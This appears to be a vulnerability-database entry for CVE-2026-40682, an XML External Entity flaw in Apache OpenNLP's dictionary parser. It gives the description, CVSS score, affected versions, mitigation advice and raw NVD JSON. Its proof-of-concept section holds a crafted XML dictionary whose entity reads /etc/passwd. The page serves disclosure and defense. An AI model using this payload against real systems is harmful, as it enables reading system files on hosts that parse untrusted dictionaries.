Security Vulnerability Report
中文
CVE-2026-40682 CVSS 9.1 CRITICAL

CVE-2026-40682

Published: 2026-05-04 17:16:24
Last Modified: 2026-05-06 18:00:50

Description

XML External Entity (XXE) via Unsanitized Dictionary Parsing in Apache OpenNLP DictionaryEntryPersistor Versions Affected: before 2.5.9, before 3.0.0-M3 Description: The DictionaryEntryPersistor class initializes a static SAXParserFactory at class-load time without enabling FEATURE_SECURE_PROCESSING or disabling DTD processing. When create(InputStream, EntryInserter) is invoked, the only feature set on the XMLReader is namespace support — external entity resolution and DOCTYPE declarations remain fully enabled. An attacker who can supply a crafted dictionary file (e.g., a stop-word list or domain dictionary) containing a malicious DOCTYPE declaration can trigger local file disclosure via file:// entity references or server-side request forgery via http:// entity references during SAX parsing, before the application processes a single dictionary entry. This is inconsistent with the project's own XmlUtil.createSaxParser() helper, which correctly sets FEATURE_SECURE_PROCESSING and disallow-doctype-decl and is used by all other XML parsing paths in the codebase. The public Dictionary(InputStream) constructor delegates directly to this method and is the documented API for loading user-supplied dictionaries, making untrusted input a realistic scenario. Mitigation: 2.x users should upgrade to 2.5.9. 3.x users should upgrade to 3.0.0-M3. Users who cannot upgrade immediately should ensure that all dictionary files are sourced from trusted origins and should consider wrapping the Dictionary(InputStream) constructor with input validation that rejects any XML containing a DOCTYPE declaration before it reaches the parser.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:opennlp:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:apache:opennlp:3.0.0:m1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:apache:opennlp:3.0.0:m2:*:*:*:*:*:* - VULNERABLE
Apache OpenNLP < 2.5.9
Apache OpenNLP 3.0.0-M3 之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?xml version="1.0" encoding="UTF-8"?> <!-- Malicious dictionary file crafted by attacker --> <!DOCTYPE data [ <!-- Define an entity to read a local file (e.g., /etc/passwd) --> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <dictionary> <entry> <!-- The entity is resolved during parsing, leaking file content --> <word>&xxe;</word> </entry> </dictionary>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40682", "sourceIdentifier": "[email protected]", "published": "2026-05-04T17:16:23.657", "lastModified": "2026-05-06T18:00:49.673", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "XML External Entity (XXE) via Unsanitized Dictionary Parsing in Apache OpenNLP DictionaryEntryPersistor\n\n\nVersions Affected: before 2.5.9, before 3.0.0-M3\n\n\nDescription: The DictionaryEntryPersistor class initializes a static SAXParserFactory at class-load time without enabling FEATURE_SECURE_PROCESSING or disabling DTD processing. When create(InputStream, EntryInserter) is invoked, the only feature set on the XMLReader is namespace support — external entity resolution and DOCTYPE declarations remain fully enabled. An attacker who can supply a crafted dictionary file (e.g., a stop-word list or domain dictionary) containing a malicious DOCTYPE declaration can trigger local file disclosure via file:// entity references or server-side request forgery via http:// entity references during SAX parsing, before the application processes a single dictionary entry. This is inconsistent with the project's own XmlUtil.createSaxParser() helper, which correctly sets FEATURE_SECURE_PROCESSING and disallow-doctype-decl and is used by all other XML parsing paths in the codebase. The public Dictionary(InputStream) constructor delegates directly to this method and is the documented API for loading user-supplied dictionaries, making untrusted input a realistic scenario.\n\n\nMitigation: 2.x users should upgrade to 2.5.9. 3.x users should upgrade to 3.0.0-M3. Users who cannot upgrade immediately should ensure that all dictionary files are sourced from trusted origins and should consider wrapping the Dictionary(InputStream) constructor with input validation that rejects any XML containing a DOCTYPE declaration before it reaches the parser."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:opennlp:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.5.9", "matchCriteriaId": "3E73109B-BF5E-4832-B5DC-1747D3C42287"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:opennlp:3.0.0:m1:*:*:*:*:*:*", "matchCriteriaId": "57E14048-91DB-4673-9A7B-B15675B3994A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:opennlp:3.0.0:m2:*:*:*:*:*:*", "matchCriteriaId": "2E738486-C0BD-4FDB-8880-DBC2BA4C0D77"}]}]}], "references": [{"url": "https://lists.apache.org/thread/r6jpt0qr9nj67gqhppqg7jxf8vsbo0w6", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/01/19", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}